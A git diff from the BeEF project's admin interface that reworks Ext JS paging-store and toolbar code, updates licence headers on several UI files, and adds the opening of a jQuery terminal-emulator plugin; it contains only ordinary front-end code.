Ext.data.Api.Error('execute', action); - } - options = Ext.applyIf(options || {}, { - params: {} - }); - if (batch !== undefined) { - this.addToBatch(batch); - } - var doRequest = true; - if (action === 'read') { - doRequest = this.fireEvent('beforeload', this, options); - Ext.applyIf(options.params, this.baseParams); - } - else { - if (this.writer.listful === true && this.restful !== true) { - rs = (Ext.isArray(rs)) ? 
rs : [rs]; - } - else if (Ext.isArray(rs) && rs.length == 1) { - rs = rs.shift(); - } - if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) { - this.writer.apply(options.params, this.baseParams, action, rs); - } - } - if (doRequest !== false) { - if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) { - options.params.xaction = action; - } - // *** add *** - if (action === "read" && this.isPaging(Ext.apply({}, options.params))) { - (function () { - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - this.applyPaging(); - this.fireEvent("datachanged", this); - var r = [].concat(this.data.items); - this.fireEvent("load", this, r, options); - if (options.callback) { - options.callback.call(options.scope || this, r, options, true); - } - }).defer(1, this); - return true; - } - // *** end *** - this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options); - } - return doRequest; - }, - loadRecords: function (o, options, success) { - if (this.isDestroyed === true) { - return; - } - if (!o || success === false) { - if (success !== false) { - this.fireEvent('load', this, [], options); - } - if (options.callback) { - options.callback.call(options.scope || this, [], options, false, o); - } - return; - } - var r = o.records, - t = o.totalRecords || r.length; - if (!options || options.add !== true) { - if (this.pruneModifiedRecords) { - this.modified = []; - } - for (var i = 0, len = r.length; i < len; i++) { - r[i].join(this); - } - //if (this.snapshot) { - // this.data = this.snapshot; - // delete this.snapshot; - //} - this.clearData(); - this.data.addAll(r); - this.totalLength = t; - this.applySort(); - // *** add *** - if (!this.allData) { - this.applyPaging(); - } - if (r.length > this.getCount()) { - r = [].concat(this.data.items); - } - // *** end *** - this.fireEvent('datachanged', 
this); - } else { - this.totalLength = Math.max(t, this.data.length + r.length); - this.add(r); - } - this.fireEvent('load', this, r, options); - if (options.callback) { - options.callback.call(options.scope || this, r, options, true); - } - }, - loadData: function (o, append) { - // *** add *** - this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams)); - // *** end *** - var r = this.reader.readRecords(o); - this.loadRecords(r, { - add: append - }, true); - }, - getTotalCount: function () { - // *** add *** - if (this.allData) { - return this.allData.getCount(); - } - // *** end *** - return this.totalLength || 0; - }, - sortData: function () { - var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo, - direction = sortInfo.direction || "ASC", - sorters = sortInfo.sorters, - sortFns = []; - if (!this.hasMultiSort) { - sorters = [{ - direction: direction, - field: sortInfo.field - }]; - } - for (var i = 0, j = sorters.length; i < j; i++) { - sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction)); - } - if (!sortFns.length) { - return; - } - var directionModifier = direction.toUpperCase() == "DESC" ? 
-1 : 1; - var fn = function (r1, r2) { - var result = sortFns[0].call(this, r1, r2); - if (sortFns.length > 1) { - for (var i = 1, j = sortFns.length; i < j; i++) { - result = result || sortFns[i].call(this, r1, r2); - } - } - return directionModifier * result; - }; - // *** add *** - if (this.allData) { - this.data = this.allData; - delete this.allData; - } - // *** end *** - this.data.sort(direction, fn); - if (this.snapshot && this.snapshot != this.data) { - this.snapshot.sort(direction, fn); - } - // *** add *** - this.applyPaging(); - // *** end *** - }, - filterBy: function (fn, scope) { - // *** add *** - this.snapshot = this.snapshot || this.allData || this.data; - // *** end *** - // this.snapshot = this.snapshot || this.data; - this.data = this.queryBy(fn, scope || this); - // *** add *** - this.applyPaging(); - // *** end *** - this.fireEvent('datachanged', this); - }, - clearFilter: function (suppressEvent) { - if (this.isFiltered()) { - this.data = this.snapshot; - delete this.snapshot; - // *** add *** - delete this.allData; - this.applyPaging(); - // *** end *** - if (suppressEvent !== true) { - this.fireEvent('datachanged', this); - } - } - }, - isFiltered: function () { - // *** add *** - return !!this.snapshot && this.snapshot != (this.allData || this.data); - // *** end *** - // return !!this.snapshot && this.snapshot != this.data; - }, - queryBy: function (fn, scope) { - // *** add *** - var data = this.snapshot || this.allData || this.data; - // *** end *** - // var data = this.snapshot || this.data; - return data.filterBy(fn, scope || this); - }, - collect: function (dataIndex, allowNull, bypassFilter) { - // *** add *** - var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items; - // *** end *** - // var d = (bypassFilter === true && this.snapshot) ? 
this.snapshot.items : this.data.items; - var v, sv, r = [], - l = {}; - for (var i = 0, len = d.length; i < len; i++) { - v = d[i].data[dataIndex]; - sv = String(v); - if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) { - l[sv] = true; - r[r.length] = v; - } - } - return r; - }, - findInsertIndex : function(record){ - this.suspendEvents(); - var data = this.data.clone(); - this.data.add(record); - this.applySort(); - var index = this.data.indexOf(record); - this.data = data; - // *** add *** - this.totalLength--; - // *** end *** - this.resumeEvents(); - return index; - }, - // *** add *** - isPaging: function (params) { - var pn = this.paramNames, - start = params[pn.start], - limit = params[pn.limit]; - if ((typeof start != 'number') || (typeof limit != 'number')) { - delete this.start; - delete this.limit; - this.lastParams = params; - return false; - } - this.start = start; - this.limit = limit; - delete params[pn.start]; - delete params[pn.limit]; - var lastParams = this.lastParams; - this.lastParams = params; - if (!this.proxy) { - return true; - } - if (!lastParams) { - return false; - } - for (var param in params) { - if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) { - return false; - } - } - for (param in lastParams) { - if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) { - return false; - } - } - return true; - }, - applyPaging: function () { - var start = this.start, - limit = this.limit; - if ((typeof start == 'number') && (typeof limit == 'number')) { - var allData = this.data, - data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey); - data.items = allData.items.slice(start, start + limit); - data.keys = allData.keys.slice(start, start + limit); - var len = data.length = data.items.length; - var map = {}; - for (var i = 0; i < len; i++) { - var item = data.items[i]; - map[data.getKey(item)] = item; - } - data.map = map; - this.allData = allData; - this.data = data; - } - } - // 
*** end *** -}); - -Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.DirectStore.prototype.constructor -}); -Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore); - -Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.JsonStore.prototype.constructor -}); -Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore); - -Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.XmlStore.prototype.constructor -}); -Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore); - -Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, { - constructor: Ext.data.ArrayStore.prototype.constructor, - loadData: function (data, append) { - if (this.expandData === true) { - var r = []; - for (var i = 0, len = data.length; i < len; i++) { - r[r.length] = [data[i]]; - } - data = r; - } - Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append); - } -}); -Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore); - -Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore; -Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore); - -Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [ - 'constructor', - 'remoteGroup', - 'groupOnSort', - 'groupDir', - 'clearGrouping', - 'groupBy', - 'sort', - 'applyGroupField', - 'applyGrouping', - 'getGroupState' -])); -Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore); - -Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, { - onLoad: function (store, r, o) { - if (!this.rendered) { - this.dsLoaded = [store, r, o]; - return; - } - var p = this.getParams(); - this.cursor = (o.params && o.params[p.start]) ? 
o.params[p.start] : 0; - this.onChange(); - // *** end *** - // var d = this.getPageData(), - // ap = d.activePage, - // ps = d.pages; - // this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); - // this.inputItem.setValue(ap); - // this.first.setDisabled(ap == 1); - // this.prev.setDisabled(ap == 1); - // this.next.setDisabled(ap == ps); - // this.last.setDisabled(ap == ps); - // this.refresh.enable(); - // this.updateInfo(); - // this.fireEvent('change', this, d); - }, - onChange: function () { - // *** add *** - var t = this.store.getTotalCount(), - s = this.pageSize; - if (this.cursor >= t) { - this.cursor = Math.ceil((t + 1) / s) * s; - } - // *** end *** - var d = this.getPageData(), - ap = d.activePage, - ps = d.pages; - this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); - this.inputItem.setValue(ap); - this.first.setDisabled(ap == 1); - this.prev.setDisabled(ap == 1); - this.next.setDisabled(ap == ps); - this.last.setDisabled(ap == ps); - this.refresh.enable(); - this.updateInfo(); - this.fireEvent('change', this, d); - }, - onClear: function () { - this.cursor = 0; - this.onChange(); - }, - doRefresh: function () { - // *** add *** - delete this.store.lastParams; - // *** end *** - this.doLoad(this.cursor); - }, - bindStore: function (store, initial) { - var doLoad; - if (!initial && this.store) { - if (store !== this.store && this.store.autoDestroy) { - this.store.destroy(); - } else { - this.store.un('beforeload', this.beforeLoad, this); - this.store.un('load', this.onLoad, this); - this.store.un('exception', this.onLoadError, this); - // *** add *** - this.store.un('datachanged', this.onChange, this); - this.store.un('add', this.onChange, this); - this.store.un('remove', this.onChange, this); - this.store.un('clear', this.onClear, this); - // *** end *** - } - if (!store) { - this.store = null; - } - } - if (store) { - store = Ext.StoreMgr.lookup(store); - store.on({ - scope: this, - beforeload: this.beforeLoad, - 
load: this.onLoad, - exception: this.onLoadError, - // *** add *** - datachanged: this.onChange, - add: this.onChange, - remove: this.onChange, - clear: this.onClear - // *** end *** - }); - doLoad = true; - } - this.store = store; - if (doLoad) { - this.onLoad(store, null, {}); - } - } -}); -Ext.reg('ux.paging', Ext.ux.PagingToolbar); +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/* + * PagingStore for Ext 3.2 - v0.5 + */ +Ext.ns('Ext.ux.data'); +Ext.ux.data.PagingStore = Ext.extend(Ext.data.Store, { + add: function (records) { + records = [].concat(records); + if (records.length < 1) { + return; + } + for (var i = 0, len = records.length; i < len; i++) { + records[i].join(this); + } + var index = this.data.length; + this.data.addAll(records); + // *** add *** + if (this.allData) { + this.allData.addAll(records); + } + // *** end *** + if (this.snapshot) { + this.snapshot.addAll(records); + } + // *** add *** + this.totalLength += records.length; + // *** end *** + this.fireEvent('add', this, records, index); + }, + remove: function (record) { + if (Ext.isArray(record)) { + Ext.each(record, function (r) { + this.remove(r); + }, this); + return; + } + // *** add *** + if (this != record.store) { + return; + } + record.join(null); + // *** end *** + var index = this.data.indexOf(record); + if (index > -1) { + // record.join(null); + this.data.removeAt(index); + } + if (this.pruneModifiedRecords) { + this.modified.remove(record); + } + // *** add *** + if (this.allData) { + this.allData.remove(record); + } + // *** end *** + if (this.snapshot) { + this.snapshot.remove(record); + } + // *** add *** + this.totalLength--; + // *** end *** + if (index > -1) { + this.fireEvent('remove', this, record, index); + } + }, + removeAll: function (silent) { + // *** add *** + var items = [].concat((this.snapshot || this.allData || 
this.data).items); + // *** end *** + // var items = []; + // this.each(function (rec) { + // items.push(rec); + // }); + this.clearData(); + // if (this.snapshot) { + // this.snapshot.clear(); + // } + if (this.pruneModifiedRecords) { + this.modified = []; + } + // *** add *** + this.totalLength = 0; + // *** end *** + if (silent !== true) { + this.fireEvent('clear', this, items); + } + }, + insert: function (index, records) { + records = [].concat(records); + for (var i = 0, len = records.length; i < len; i++) { + this.data.insert(index, records[i]); + records[i].join(this); + } + // *** add *** + if (this.allData) { + this.allData.addAll(records); + } + // *** end *** + if (this.snapshot) { + this.snapshot.addAll(records); + } + // *** add *** + this.totalLength += records.length; + // *** end *** + this.fireEvent('add', this, records, index); + }, + getById: function (id) { + // *** add *** + return (this.snapshot || this.allData || this.data).key(id); + // *** end *** + // return this.data.key(id); + }, + clearData: function () { + // *** add *** + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + if (this.snapshot) { + this.data = this.snapshot; + delete this.snapshot; + } + // *** end *** + this.data.each(function (rec) { + rec.join(null); + }); + this.data.clear(); + }, + execute: function (action, rs, options, batch) { + if (!Ext.data.Api.isAction(action)) { + throw new Ext.data.Api.Error('execute', action); + } + options = Ext.applyIf(options || {}, { + params: {} + }); + if (batch !== undefined) { + this.addToBatch(batch); + } + var doRequest = true; + if (action === 'read') { + doRequest = this.fireEvent('beforeload', this, options); + Ext.applyIf(options.params, this.baseParams); + } + else { + if (this.writer.listful === true && this.restful !== true) { + rs = (Ext.isArray(rs)) ? 
rs : [rs]; + } + else if (Ext.isArray(rs) && rs.length == 1) { + rs = rs.shift(); + } + if ((doRequest = this.fireEvent('beforewrite', this, action, rs, options)) !== false) { + this.writer.apply(options.params, this.baseParams, action, rs); + } + } + if (doRequest !== false) { + if (this.writer && this.proxy.url && !this.proxy.restful && !Ext.data.Api.hasUniqueUrl(this.proxy, action)) { + options.params.xaction = action; + } + // *** add *** + if (action === "read" && this.isPaging(Ext.apply({}, options.params))) { + (function () { + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + this.applyPaging(); + this.fireEvent("datachanged", this); + var r = [].concat(this.data.items); + this.fireEvent("load", this, r, options); + if (options.callback) { + options.callback.call(options.scope || this, r, options, true); + } + }).defer(1, this); + return true; + } + // *** end *** + this.proxy.request(Ext.data.Api.actions[action], rs, options.params, this.reader, this.createCallback(action, rs, batch), this, options); + } + return doRequest; + }, + loadRecords: function (o, options, success) { + if (this.isDestroyed === true) { + return; + } + if (!o || success === false) { + if (success !== false) { + this.fireEvent('load', this, [], options); + } + if (options.callback) { + options.callback.call(options.scope || this, [], options, false, o); + } + return; + } + var r = o.records, + t = o.totalRecords || r.length; + if (!options || options.add !== true) { + if (this.pruneModifiedRecords) { + this.modified = []; + } + for (var i = 0, len = r.length; i < len; i++) { + r[i].join(this); + } + //if (this.snapshot) { + // this.data = this.snapshot; + // delete this.snapshot; + //} + this.clearData(); + this.data.addAll(r); + this.totalLength = t; + this.applySort(); + // *** add *** + if (!this.allData) { + this.applyPaging(); + } + if (r.length > this.getCount()) { + r = [].concat(this.data.items); + } + // *** end *** + this.fireEvent('datachanged', 
this); + } else { + this.totalLength = Math.max(t, this.data.length + r.length); + this.add(r); + } + this.fireEvent('load', this, r, options); + if (options.callback) { + options.callback.call(options.scope || this, r, options, true); + } + }, + loadData: function (o, append) { + // *** add *** + this.isPaging(Ext.apply({}, this.lastOptions ? this.lastOptions.params : null, this.baseParams)); + // *** end *** + var r = this.reader.readRecords(o); + this.loadRecords(r, { + add: append + }, true); + }, + getTotalCount: function () { + // *** add *** + if (this.allData) { + return this.allData.getCount(); + } + // *** end *** + return this.totalLength || 0; + }, + sortData: function () { + var sortInfo = this.hasMultiSort ? this.multiSortInfo : this.sortInfo, + direction = sortInfo.direction || "ASC", + sorters = sortInfo.sorters, + sortFns = []; + if (!this.hasMultiSort) { + sorters = [{ + direction: direction, + field: sortInfo.field + }]; + } + for (var i = 0, j = sorters.length; i < j; i++) { + sortFns.push(this.createSortFunction(sorters[i].field, sorters[i].direction)); + } + if (!sortFns.length) { + return; + } + var directionModifier = direction.toUpperCase() == "DESC" ? 
-1 : 1; + var fn = function (r1, r2) { + var result = sortFns[0].call(this, r1, r2); + if (sortFns.length > 1) { + for (var i = 1, j = sortFns.length; i < j; i++) { + result = result || sortFns[i].call(this, r1, r2); + } + } + return directionModifier * result; + }; + // *** add *** + if (this.allData) { + this.data = this.allData; + delete this.allData; + } + // *** end *** + this.data.sort(direction, fn); + if (this.snapshot && this.snapshot != this.data) { + this.snapshot.sort(direction, fn); + } + // *** add *** + this.applyPaging(); + // *** end *** + }, + filterBy: function (fn, scope) { + // *** add *** + this.snapshot = this.snapshot || this.allData || this.data; + // *** end *** + // this.snapshot = this.snapshot || this.data; + this.data = this.queryBy(fn, scope || this); + // *** add *** + this.applyPaging(); + // *** end *** + this.fireEvent('datachanged', this); + }, + clearFilter: function (suppressEvent) { + if (this.isFiltered()) { + this.data = this.snapshot; + delete this.snapshot; + // *** add *** + delete this.allData; + this.applyPaging(); + // *** end *** + if (suppressEvent !== true) { + this.fireEvent('datachanged', this); + } + } + }, + isFiltered: function () { + // *** add *** + return !!this.snapshot && this.snapshot != (this.allData || this.data); + // *** end *** + // return !!this.snapshot && this.snapshot != this.data; + }, + queryBy: function (fn, scope) { + // *** add *** + var data = this.snapshot || this.allData || this.data; + // *** end *** + // var data = this.snapshot || this.data; + return data.filterBy(fn, scope || this); + }, + collect: function (dataIndex, allowNull, bypassFilter) { + // *** add *** + var d = (bypassFilter === true ? this.snapshot || this.allData || this.data : this.data).items; + // *** end *** + // var d = (bypassFilter === true && this.snapshot) ? 
this.snapshot.items : this.data.items; + var v, sv, r = [], + l = {}; + for (var i = 0, len = d.length; i < len; i++) { + v = d[i].data[dataIndex]; + sv = String(v); + if ((allowNull || !Ext.isEmpty(v)) && !l[sv]) { + l[sv] = true; + r[r.length] = v; + } + } + return r; + }, + findInsertIndex : function(record){ + this.suspendEvents(); + var data = this.data.clone(); + this.data.add(record); + this.applySort(); + var index = this.data.indexOf(record); + this.data = data; + // *** add *** + this.totalLength--; + // *** end *** + this.resumeEvents(); + return index; + }, + // *** add *** + isPaging: function (params) { + var pn = this.paramNames, + start = params[pn.start], + limit = params[pn.limit]; + if ((typeof start != 'number') || (typeof limit != 'number')) { + delete this.start; + delete this.limit; + this.lastParams = params; + return false; + } + this.start = start; + this.limit = limit; + delete params[pn.start]; + delete params[pn.limit]; + var lastParams = this.lastParams; + this.lastParams = params; + if (!this.proxy) { + return true; + } + if (!lastParams) { + return false; + } + for (var param in params) { + if (params.hasOwnProperty(param) && (params[param] !== lastParams[param])) { + return false; + } + } + for (param in lastParams) { + if (lastParams.hasOwnProperty(param) && (params[param] !== lastParams[param])) { + return false; + } + } + return true; + }, + applyPaging: function () { + var start = this.start, + limit = this.limit; + if ((typeof start == 'number') && (typeof limit == 'number')) { + var allData = this.data, + data = new Ext.util.MixedCollection(allData.allowFunctions, allData.getKey); + data.items = allData.items.slice(start, start + limit); + data.keys = allData.keys.slice(start, start + limit); + var len = data.length = data.items.length; + var map = {}; + for (var i = 0; i < len; i++) { + var item = data.items[i]; + map[data.getKey(item)] = item; + } + data.map = map; + this.allData = allData; + this.data = data; + } + } + // 
*** end *** +}); + +Ext.ux.data.PagingDirectStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.DirectStore.prototype.constructor +}); +Ext.reg('pagingdirectstore', Ext.ux.data.PagingDirectStore); + +Ext.ux.data.PagingJsonStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.JsonStore.prototype.constructor +}); +Ext.reg('pagingjsonstore', Ext.ux.data.PagingJsonStore); + +Ext.ux.data.PagingXmlStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.XmlStore.prototype.constructor +}); +Ext.reg('pagingxmlstore', Ext.ux.data.PagingXmlStore); + +Ext.ux.data.PagingArrayStore = Ext.extend(Ext.ux.data.PagingStore, { + constructor: Ext.data.ArrayStore.prototype.constructor, + loadData: function (data, append) { + if (this.expandData === true) { + var r = []; + for (var i = 0, len = data.length; i < len; i++) { + r[r.length] = [data[i]]; + } + data = r; + } + Ext.ux.data.PagingArrayStore.superclass.loadData.call(this, data, append); + } +}); +Ext.reg('pagingarraystore', Ext.ux.data.PagingArrayStore); + +Ext.ux.data.PagingSimpleStore = Ext.ux.data.PagingArrayStore; +Ext.reg('pagingsimplestore', Ext.ux.data.PagingSimpleStore); + +Ext.ux.data.PagingGroupingStore = Ext.extend(Ext.ux.data.PagingStore, Ext.copyTo({}, Ext.data.GroupingStore.prototype, [ + 'constructor', + 'remoteGroup', + 'groupOnSort', + 'groupDir', + 'clearGrouping', + 'groupBy', + 'sort', + 'applyGroupField', + 'applyGrouping', + 'getGroupState' +])); +Ext.reg('paginggroupingstore', Ext.ux.data.PagingGroupingStore); + +Ext.ux.PagingToolbar = Ext.extend(Ext.PagingToolbar, { + onLoad: function (store, r, o) { + if (!this.rendered) { + this.dsLoaded = [store, r, o]; + return; + } + var p = this.getParams(); + this.cursor = (o.params && o.params[p.start]) ? 
o.params[p.start] : 0; + this.onChange(); + // *** end *** + // var d = this.getPageData(), + // ap = d.activePage, + // ps = d.pages; + // this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); + // this.inputItem.setValue(ap); + // this.first.setDisabled(ap == 1); + // this.prev.setDisabled(ap == 1); + // this.next.setDisabled(ap == ps); + // this.last.setDisabled(ap == ps); + // this.refresh.enable(); + // this.updateInfo(); + // this.fireEvent('change', this, d); + }, + onChange: function () { + // *** add *** + var t = this.store.getTotalCount(), + s = this.pageSize; + if (this.cursor >= t) { + this.cursor = Math.ceil((t + 1) / s) * s; + } + // *** end *** + var d = this.getPageData(), + ap = d.activePage, + ps = d.pages; + this.afterTextItem.setText(String.format(this.afterPageText, d.pages)); + this.inputItem.setValue(ap); + this.first.setDisabled(ap == 1); + this.prev.setDisabled(ap == 1); + this.next.setDisabled(ap == ps); + this.last.setDisabled(ap == ps); + this.refresh.enable(); + this.updateInfo(); + this.fireEvent('change', this, d); + }, + onClear: function () { + this.cursor = 0; + this.onChange(); + }, + doRefresh: function () { + // *** add *** + delete this.store.lastParams; + // *** end *** + this.doLoad(this.cursor); + }, + bindStore: function (store, initial) { + var doLoad; + if (!initial && this.store) { + if (store !== this.store && this.store.autoDestroy) { + this.store.destroy(); + } else { + this.store.un('beforeload', this.beforeLoad, this); + this.store.un('load', this.onLoad, this); + this.store.un('exception', this.onLoadError, this); + // *** add *** + this.store.un('datachanged', this.onChange, this); + this.store.un('add', this.onChange, this); + this.store.un('remove', this.onChange, this); + this.store.un('clear', this.onClear, this); + // *** end *** + } + if (!store) { + this.store = null; + } + } + if (store) { + store = Ext.StoreMgr.lookup(store); + store.on({ + scope: this, + beforeload: this.beforeLoad, + 
load: this.onLoad, + exception: this.onLoadError, + // *** add *** + datachanged: this.onChange, + add: this.onChange, + remove: this.onChange, + clear: this.onClear + // *** end *** + }); + doLoad = true; + } + this.store = store; + if (doLoad) { + this.onLoad(store, null, {}); + } + } +}); +Ext.reg('ux.paging', Ext.ux.PagingToolbar); diff --git a/extensions/admin_ui/media/javascript/ux/StatusBar.js b/extensions/admin_ui/media/javascript/ux/StatusBar.js index ac1e5f5c6..9b70abe46 100644 --- a/extensions/admin_ui/media/javascript/ux/StatusBar.js +++ b/extensions/admin_ui/media/javascript/ux/StatusBar.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + /*! * Ext JS Library 3.1.1 * Copyright(c) 2006-2010 Ext JS, LLC diff --git a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js index 7ed3a50ac..a9bfde238 100644 --- a/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js +++ b/extensions/admin_ui/media/javascript/ux/TabCloseMenu.js 
@@ -1,73 +1,64 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -/*! - * Ext JS Library 3.1.1 - * Copyright(c) 2006-2010 Ext JS, LLC - * licensing@extjs.com - * http://www.extjs.com/license - */ -/** - * @class Ext.ux.TabCloseMenu - * @extends Object - * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs. - * - * @ptype tabclosemenu - */ -Ext.ux.TabCloseMenu = function(){ - var tabs, menu, ctxItem; - this.init = function(tp){ - tabs = tp; - tabs.on('contextmenu', onContextMenu); - }; - - function onContextMenu(ts, item, e){ - if(!menu){ // create context menu on first right click - menu = new Ext.menu.Menu({ - items: [{ - id: tabs.id + '-close', - text: 'Close Tab', - handler : function(){ - tabs.remove(ctxItem); - } - },{ - id: tabs.id + '-close-others', - text: 'Close Other Tabs', - handler : function(){ - tabs.items.each(function(item){ - if(item.closable && item != ctxItem){ - tabs.remove(item); - } - }); - } - }]}); - } - ctxItem = item; - var items = menu.items; - items.get(tabs.id + '-close').setDisabled(!item.closable); - var disableOthers = true; - tabs.items.each(function(){ - if(this != item && this.closable){ - disableOthers = false; - return false; - } - }); - items.get(tabs.id + '-close-others').setDisabled(disableOthers); - e.stopEvent(); - menu.showAt(e.getPoint()); - } -}; - -Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu); +// +// Copyright (c) 2006-2012 Wade 
Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +/*! + * Ext JS Library 3.1.1 + * Copyright(c) 2006-2010 Ext JS, LLC + * licensing@extjs.com + * http://www.extjs.com/license + */ +/** + * @class Ext.ux.TabCloseMenu + * @extends Object + * Plugin (ptype = 'tabclosemenu') for adding a close context menu to tabs. + * + * @ptype tabclosemenu + */ +Ext.ux.TabCloseMenu = function(){ + var tabs, menu, ctxItem; + this.init = function(tp){ + tabs = tp; + tabs.on('contextmenu', onContextMenu); + }; + + function onContextMenu(ts, item, e){ + if(!menu){ // create context menu on first right click + menu = new Ext.menu.Menu({ + items: [{ + id: tabs.id + '-close', + text: 'Close Tab', + handler : function(){ + tabs.remove(ctxItem); + } + },{ + id: tabs.id + '-close-others', + text: 'Close Other Tabs', + handler : function(){ + tabs.items.each(function(item){ + if(item.closable && item != ctxItem){ + tabs.remove(item); + } + }); + } + }]}); + } + ctxItem = item; + var items = menu.items; + items.get(tabs.id + '-close').setDisabled(!item.closable); + var disableOthers = true; + tabs.items.each(function(){ + if(this != item && this.closable){ + disableOthers = false; + return false; + } + }); + items.get(tabs.id + '-close-others').setDisabled(disableOthers); + e.stopEvent(); + menu.showAt(e.getPoint()); + } +}; + +Ext.preg('tabclosemenu', Ext.ux.TabCloseMenu); diff --git a/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js new file mode 100644 index 000000000..4ca740001 --- /dev/null +++ b/extensions/admin_ui/media/javascript/wterm/wterm.jquery.js 
@@ -0,0 +1,424 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + +/** + * @Author : venkatakrishnan ganesh + * @file : wterm.jquery.js + * @url : http://wterminal.appspot.com + * @desc : + * + * Allows Emulation of Terminal on the browser. + * Completely Extendible. + * Command History. + * Commandline Editing. + * + * Modified by antisnatchor (also to prevent XSS, see line 270) + * */ + +( function( $ ) { + + + var VERSION = '0.0.4'; + + /** + * + * @function : get_defaults + * @returns : Object + * @desc : Returns Global Defaults + * + * */ + var get_defaults = function() { + + return { + + // PS1 : The Primary Prompt + PS1 : 'BeEF-bind-$', + + // TERMINAL_CLASS + // Will be applied to the primary terminal container + TERMINAL_CLASS : 'wterm_terminal', + + // PROMPT_CLASS + // Will Applied to prompt container + PROMPT_CLASS : 'wterm_prompt', + + // THEME_CLASS_PREFIX + // All Theme Classes will be prefixed by this string + THEME_CLASS_PREFIX : 'wterm_theme', + + // DEFAULT_THEME + // The theme that is applied by default + DEFAULT_THEME : '_green_on_black', + + // HIGHLIGHT_CLASS + // The Class that is applied to highlighted text + HIGHLIGHT_CLASS : 'wterm_highlight', + + // KEYWORD_CLASS + // The Class that is applied to keywords + KEYWORD_CLASS : 'wterm_keyword', + + // CONTENT_CLASS + // The Class that is applied to content section + KEYWORD_CLASS : 'wterm_content', + + // WIDTH | HIGHT + // Explicitly set width and height of the terminal + // container. 
This may also be done in TERMINAL_CLASS + WIDTH : '90%', + HEIGHT : '90%', + + // WELCOME_MESSAGE + // Message to be shown when the terminal is first + // published + WELCOME_MESSAGE : 'Welcome to Wterm version-' + VERSION , + + // NOT_FOUND + // Message to be published if the command is not found + // Note: "CMD" will be replaced with the actual command + NOT_FOUND : '
CMD: Command Not Found
